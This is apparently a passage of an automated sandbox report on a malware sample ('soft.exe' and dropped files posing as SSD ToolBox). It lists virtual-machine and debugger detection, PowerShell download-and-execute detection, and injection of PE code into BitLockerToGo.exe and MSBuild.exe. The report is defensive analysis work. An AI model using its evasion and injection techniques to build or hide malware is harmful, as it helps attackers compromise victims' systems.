                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                            Query firmware table information (likely to detect VMs)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformation
                            Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,13_2_02B9E9C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1826Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1522Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5136Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4697Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_iscrypt.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcp100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-PEPS4.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-21QH6.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-AN5KL.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-1LUFJ.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\unins000.exe (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuin51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcr100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-HP0G4.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-TUAE9.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libGLESv2.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-DUVGJ.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5PrintSupport.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5Concurrent.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-SE3Q7.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuuc51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libEGL.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\is-SDRVH.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-MMTOB.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_11-5972
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_13-62265
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeAPI coverage: 4.6 %
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe TID: 2060Thread sleep time: -60000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe TID: 3620Thread sleep time: -420000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880Thread sleep count: 5136 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360Thread sleep count: 4697 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5112Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1260Thread sleep time: -120000s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00452AD4 FindFirstFileA,GetLastError,12_2_00452AD4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00475798 FindFirstFileA,FindNextFileA,FindClose,12_2_00475798
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,12_2_0046417C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,12_2_004645F8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,12_2_00462BF0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,12_2_00498FDC
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,14_2_00007FF7444E204C
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,11_2_00409B78
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: svchost.exe, 00000004.00000002.2530831741.000001C9C5271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530963758.000001C9C527F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entVers(@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: S-1-5-1 @\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: soft.exe, 00000005.00000002.1722085001.00000000010C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003342000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2531042833.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2277607739.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: svchost.exe, 00000004.00000002.2530328856.000001C9C5202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: svchost.exe, 00000004.00000002.2531115725.000001C9C5302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws NT\C*@\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ro
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
                            Source: soft.exeBinary or memory string: 127.0.0.1:53152587890625762939453125AMDisbetter!Align 1-ByteArchitectureAuthenticAMDBidi_ControlCIDR addressCONTINUATIONCentaurHaulsCfgMgr32.dllCoCreateGuidContent TypeContent-TypeCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCExportedTypeFieldMarshalFindNextFileGenericParamGenuine RDCGenuineIntelGenuineTMx86Geode by NSCGetAddrInfoWGetCommStateGetConsoleCPGetErrorInfoGetLastErrorGetLengthSidGetNameInfoWGetProcessIdGetStdHandleGetTempPathWHygonGenuineIntelTDX Join_ControlKVMKVMKVMKVMLittleEndianLoadLibrary LoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMicrosoft HvNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWRegister=XMMReleaseMutexReportEventWResumeThreadRevertToSelfRiseRiseRiseSERIALNUMBERSetCommBreakSetCommStateSetEndOfFileSetErrorInfoSetErrorModeSetOaNoCacheSetStdHandleSiS SiS SiS Sora_SompengSyloti_NagriSysStringLenThread32NextTransmetaCPUTransmitFileUnlockFileExVIA VIA VIA VMwareVMwareVarCyFromDecVarCyFromStrVarCyFromUI1VarCyFromUI2VarCyFromUI4VarCyFromUI8VarDecFromCyVarDecFromI1VarDecFromI2VarDecFromI4VarDecFromI8VarDecFromR4VarDecFromR8VarI1FromDecVarI1FromStrVarI1FromUI1VarI1FromUI2VarI1FromUI4VarI1FromUI8VarI2FromDecVarI2FromStrVarI2FromUI1VarI2FromUI2VarI2FromUI4VarI2FromUI8VarI4FromDecVarI4FromStrVarI4FromUI1VarI4FromUI2VarI4FromUI4VarI4FromUI8VarI8FromDecVarI8FromStrVarI8FromUI1VarI8FromUI2VarI8FromUI4VarI8FromUI8VarMonthNameVarR4FromDecVarR4FromStrVarR4FromUI1VarR4FromUI2VarR4FromUI4VarR4FromUI8VarR8FromDecVarR8FromStrVarR8FromUI1VarR8FromUI2VarR8FromUI4VarR8FromUI8VarUI1FromCyVarUI1FromI1VarUI1FromI2VarUI1FromI4VarUI1FromI8VarUI1FromR4VarUI1FromR8VarUI2FromCyVarUI2FromI1VarUI2FromI2VarUI2FromI4VarUI2FromI8VarUI2FromR4VarUI2FromR8VarUI4FromCyVarUI4FromI1VarUI4FromI2VarUI4FromI4VarUI4FromI8VarUI4FromR4VarUI4FromR8VarUI8FromCyVarUI8FromI1VarUI8FromI2VarUI8FromI8VarUI8FromR4VarUI8FromR8VariantClearVirtualAllocVirtualQueryVortex86 SoCXenVMMXenVMM__WSAFDIsSetabi mismatchadvapi32.dllbad flushGenbad g statusbad g0 stackbad recoverybhyve bhyve caller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapecho requestend tracegc
                            Source: svchost.exe, 00000007.00000002.2530327585.0000024C27A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeAPI call chain: ExitProcess graph end nodegraph_11-6769
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeAPI call chain: ExitProcess graph end nodegraph_13-61916
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Found API chain indicative of debugger detection
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_13-62160
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_00401808 LdrInitializeThunk,13_2_00401808
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BA3A18 _memset,IsDebuggerPresent,13_2_02BA3A18
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BAE6CE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,LdrInitializeThunk,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,13_2_02BAE6CE
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00450334
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B95E60 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,LdrInitializeThunk,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,13_2_02B95E60
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BA80FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_02BA80FB
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF7444E8494
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E8790 SetUnhandledExceptionFilter,14_2_00007FF7444E8790

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: amsi64_4704.amsi.csv, type: OTHER
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR
                            Allocates memory in foreign processes
                            Source: C:\Users\user\Desktop\soft.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 390000 protect: page execute and read and writeJump to behavior
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 390000 value starts with: 4D5AJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 486008Jump to behavior
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 390000Jump to behavior
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 391000Jump to behavior
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3AD000Jump to behavior
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3BA000Jump to behavior
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3BC000Jump to behavior
                            Source: C:\Users\user\Desktop\soft.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3BD000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 450000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 453000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 461000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 99C008Jump to behavior
